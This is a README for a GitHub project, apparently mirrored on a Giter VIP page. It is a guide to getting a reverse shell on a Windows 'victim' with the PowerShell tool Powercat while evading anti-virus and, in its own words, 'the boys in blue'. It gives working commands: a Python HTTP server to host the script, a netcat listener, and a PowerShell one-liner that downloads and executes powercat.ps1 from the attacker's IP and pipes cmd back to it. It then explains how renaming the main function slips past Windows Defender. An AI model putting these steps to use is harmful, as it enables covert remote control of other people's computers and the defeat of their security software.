Giter VIP home page Giter VIP logo

powercat-v2.0's Introduction

Powercat-v2.0 Reverseshell Guide

A guide to evade the boys in blue when acquiring a reverse shell on Windows using Powercat v2

About this Guide

This guide allows you to acquire a reverse shell while bypassing anti-virus software on a Windows computer using a single Powershell script.

Powercat is essentially the powershell version of netcat. It is a network utility for performing low-privilege network communication operations that makes use of native PowerShell version 2 components.

Usage

Clone this repository and change the working directory

git clone https://github.com/rexpository/powercat-v2.0.git
cd powercat-v2.0

Start a Python HTTP server on a port of your choice (e.g., 70) for the victim to access the script

python -m SimpleHTTPServer 70

Start a Netcat listener on a port of your choice (e.g., 5555) for obtaining a reverse connection

sudo apt-get install netcat
nc -lp 5555

On your Windows victim machine, run the following Powershell command inside the command prompt (CMD).

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://YOURIP:70/powercat.ps1');powerrcatt -c YOURIP -p 5555 -e cmd"

Note: YOURIP should be your host's local IP address (Linux IP address); make sure to replace ports 70 and 5555 in the command with your own configurations.

You will obtain a reverse shell in the Netcat listener once the command is executed. To check what account type you're logged into, use the command whoami.

Evading Anti-virus

For the time being, if the powershell script is detected as malware by Windows Defender or other anti-virus software, this issue can be resolved by changing the name of the powerrcatt function.

Open up powercat.ps1 with ur favorite text editor and change the name of the function powerrcatt to whatever you would like (e.g., powerrrrcat)

Original script:

function powerrcatt
{
  param(
    [alias("Client")][string]$c="",
    [alias("Listen")][switch]$l=$False,
    ...

Updated script:

function powerrrrcat
{
  param(
    [alias("Client")][string]$c="",
    [alias("Listen")][switch]$l=$False,
    ...

Make sure that you update the powershell command from earlier to reflect these changes:

Original command:

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://YOURIP:70/powercat.ps1');powerrcatt -c YOURIP -p 5555 -e cmd"

Updated command:

powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://YOURIP:70/powercat.ps1');powerrrrcat -c YOURIP -p 5555 -e cmd"

Credits

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.